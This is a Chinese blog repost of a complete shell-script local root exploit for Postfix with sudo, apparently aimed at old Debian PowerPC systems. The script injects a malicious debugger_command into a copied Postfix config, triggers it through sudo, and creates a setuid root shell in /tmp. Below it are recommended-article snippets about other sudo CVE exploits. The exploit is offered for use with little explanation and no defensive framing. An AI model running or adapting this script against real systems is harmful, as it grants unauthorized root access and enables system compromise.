sudo protection bypass exploit

最新推荐文章于 2025-12-02 14:52:36 发布
最新推荐文章于 2025-12-02 14:52:36 发布 · 108 阅读 · 0
文章标签:

#shell

本文介绍了一个利用Postfix与Sudo配置漏洞进行权限提升的Shell脚本。该脚本通过设置恶意的debugger命令来绕过安全限制,并最终获取到root权限的shell。适用于Debian PowerPC不稳定版。

#!/bin/sh
#
# root shell exploit for postfix + sudo
# tested on debian powerpc unstable
#
# by Charles 'core' Stevenson <core@bokeoa.com>

# Put your password here if you're not in the sudoers file
PASSWORD=wdnownz

echo -e "sudo exploit by core <core@bokeoa.com>/n"

echo "Setting up postfix config directory..."
/bin/cp -r /etc/postfix /tmp

echo "Adding malicious debugger command..."
echo "debugger_command = /bin/cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh">>/tmp/postfix/main.cf

echo "Setting up environment..."
export MAIL_CONFIG=/tmp/postfix
export MAIL_DEBUG=

sleep 2

echo "Trying to exploit..."
echo -e "$PASSWORD/n"|/usr/bin/sudo su -

sleep 2

echo "We should have a root shell let's check..."
ls -l /tmp/sh

echo "Cleaning up..."
rm -rf /tmp/postfix

echo "Attempting to run root shell..."
/tmp/sh

iteye_11341
关注
使用sudo命令出现sudo: unknown uid 0: who are you?解决方案
热门推荐
weixin_43178406的博客
09-16 1万+
本文主要介绍了使用sudo命令出现sudo: unknown uid 0: who are you?解决方案,希望能对使用Linux的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
CVE-2021-3156:Sudo中基于堆的缓冲区溢出 (Baron Samedit)
qq_33163046的博客
02-02 1万+
Qualys研究小组在sudo中发现了一个堆溢出漏洞,sudo是一个几乎无处不在的实用程序,可用于主要的类Unix操作系统。通过利用此漏洞,任何未经授权的用户都可以使用默认sudo配置在易受攻击的主机上获得root权限。 Sudo是一个强大的实用程序,它包含在大多数基于Unix和Linux的操作系统中。它允许用户以另一个用户的安全权限运行程序。近10年来,这个漏洞本身一直隐藏在人们的视线中。它于2011年7月引入(commit 8255ed69),在默认配置中影响从1.8.2到1.8.31p2的所有旧版本
Sudo Security Bypass(CVE-2019-14287)
z4yn:)的博客
10-09 261
Sudo Security Bypass 一个在Unix Sudo程序中探索CVE-2019-14287的靶场 CVE-2019-14287新版的sudo已经修复了该漏洞,但是版本<1.8.28的sudo还可能存在该漏洞 sudo是Uinx中的命令,用于以其它用户的身份执行命令(一般为root权限) 举个例子,比如root家目录下的文件只有root权限才能访问 你sudo后就是以root权限运行cat命令,就能查看root家目录下的文件 sudo的配置文件在/etc/sudoe..
软件安全实验——pre9(堆栈保护机制、return-to-libc预习)
Onlyone_1314的博客
08-07 882
这里写目录标题1、网上搜索并且阅读2、阅读下面这篇文章:3、阅读这个链接的第3章4、阅读这个链接 1、网上搜索并且阅读 Four different tricks to bypass StackShield and StackGuard protection这篇文章,描述这些现有保护机制的弱点。 答:   堆栈屏蔽(StackShield)保护,在最初的形式中,它们只保护返回地址覆盖,而不是普通的堆栈销毁攻击。文章中所研究的三种保护方法有两种不同的设计限制只保护内存中比第一个安全保护地址更高的数据。而且
Four different tricks to bypass StackShield and StackGuard protection
10-29
Four different tricks to bypass StackShield and StackGuard protection Four different tricks to bypass StackShield and StackGuard protection Four different tricks to bypass StackShield and StackGuard protection Four different tricks to bypass StackShield and StackGuard protection Four different tricks to bypass StackShield and StackGuard protection
sudo 1.8.3p1 Local Root
cnbird's blog
05-09 1300
/* death-star.c sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass by aeon - http://infosecabsurdity.wordpress.com/ This PoC exploits: - CVE-2012-0864 - FO
bypass-403:一个简单的脚本,仅供旁路403使用
04-13
旁通403 一个简单的脚本,仅供旁路403使用 它也可以用来比较各种条件下的响应,如下图所示 用法 ./bypass-403.sh https://example.com admin ... sudo apt install figlet如果您无法看到屏幕截图中的徽标 贡献者
CVE-2021-3156:Sudo男爵Samedit漏洞
03-25
CVE-2021-3156(Sudo男爵Samedit) 该存储库是针对Linux x64的CVE-2021-3156漏洞利用。 如需撰写文章,请访问 。 档案文件 使用tcache在glibc上利用 exploit_nss.py自动检测/etc/nsswitch.conf中的所有要求和条目数...
Bypass
11-20
Bypass
wordpress-exploit-framework:一个旨在帮助WordPress系统进行渗透测试的Ruby框架
02-05
WordPress漏洞利用框架 一个旨在帮助WordPress系统进行渗透测试的Ruby框架。 安装 要安装最新的稳定版本,请运行gem install wpxf 。 安装后,您可以通过运行wpxf启动... sudo apt-get install build-essentia
Four
weixin_43748930的博客
11-22 194
1,列表标签( 块级标签 ):有序列表ol /无序列表ul /定义列表 dl 注意:他们的li/dt/dd等标签也是块级标签 无序列表ul:属性type(disc实心/circle空心圆/square方块) 有序列表ol:属性type类型/start规定起始值 /reversed [rɪ’vɜ:st]倒序 注意:start的值只能为阿拉伯数字 定义列表dl:dt定义项目/dd描述项目(dd与dt是...
OrangePi_5_Pro_RK3588S 进行ADB连接
最新发布
gene's blog
12-02 321
首先准备一根品质良好的 USB2.0 公对公数据线,通过 USB2.0 公对公数据线连接好开发板与 Ubuntu PC,开发板支持 device功能的 USB2.0 接口的位置如下图所示: 步骤1: 运行下面的命令将 USB2.0 接口设置为 device 模式 步骤2: 确认下 adbd 已经启动 步骤1: Ubuntu PC 上安装下 adb 工具 步骤2:查看下有没有识别到 adb 设备 步骤3:登录开发板的 linux 系统
【打靶日记】VluNyx 之 Serve
XHhui的博客
11-28 1028
(keepass)通过ARP扫描发现目标主机192.168.56.113,Nmap扫描显示开放22(SSH)和80(HTTP)端口。目录枚举发现/secrets/目录包含重要信息,nikto扫描检测到/notes.txt文件,提示用户名"teo"和数据库凭证存储在secret目录。使用gobuster进一步扫描发现/secrets/db.kdbx文件,可能包含关键凭证信息。
设置Zsh为默认Shell
weixin_62528784的博客
12-02 159
默认zsh
Linux 理解 Shell 提示符:PS0 PS1 PS2 PS3 PS4
https://ophome.blog.youkuaiyun.com,在IT行业有多年的工作经验,尤其是在Python、Linux、负载均衡、Nginx和服务器运维等领域。
11-28 692
Linux 理解 Shell 提示符:PS0 PS1 PS2 PS3 PS4
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值